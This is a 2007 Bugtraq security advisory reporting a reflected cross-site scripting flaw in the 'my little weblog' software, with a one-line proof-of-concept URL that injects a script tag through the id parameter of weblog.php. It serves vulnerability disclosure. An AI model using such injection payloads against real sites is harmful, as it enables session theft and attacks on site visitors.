
Date: 16 Apr 2007 19:59:12 -0000
From: the_3dit0r@...oo.com
To: bugtraq@...urityfocus.com
Subject: my little weblog Cross Site Scripting

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM


# Tilte: my little weblog Cross Site Scripting 


# Author..................: [the_Edit0r]
# HomePage................: [Www.XmorS-SEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [my little weblog] 
# Site Script ............: [http://www.mylittlehomepage.net]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]




------------------------------- proof Of Concept ---------------------------


 www.example.com/[path]/weblog.php?id=<script>alert(/the_Edit0r/);</script>


---------------------------------------------------------------------------


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]


